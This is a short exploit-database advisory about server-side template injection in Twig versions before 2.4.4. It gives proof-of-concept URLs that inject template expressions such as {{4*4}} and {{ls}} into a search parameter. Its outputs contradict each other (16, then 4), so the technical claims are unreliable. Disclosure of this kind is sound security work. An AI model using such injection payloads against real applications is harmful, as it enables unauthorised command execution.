Twig Server Side Template Injection

2018.02.17
Credit: JameelNabbo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Vulnerability details: # Exploit Title: Twig <2.4.4 Server side template injection # Date: 02/15/2018 # Exploit Author: JameelNabbo # Author website: www.jameelnabbo.com # Vendor Homepage: https://twig.symfony.com # Software Link: https://twig.symfony.com/doc/2.x/intro.html#installation # Version: < 2.4.4 # Tested on: MAC OSX 1.Description: Twig is a modern php template engine which compile templates down to plain optimized PHP code, Twig <2.4.4 contain SSTI vulnerability which allow attackers to execute commands within the Parameters, by just using {{COMAND TO EXECUTE}} instead of using the expected values aNormal integer or normal string", depends on the vulnerable application, which takes deferent params by GET or POST. Example: by injecting this in a search param http://localhost/search?search_key={{4*4}} <http://localhost/search?search_key=%7B%7B4*4%7D%7D> Output: 16 2. POC: http://localhost/search?search_key={{4*4}} OUTPUT: 4 http://localhost/search?search_key={{ls}} OUTPUT: list of files/directories etca|.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top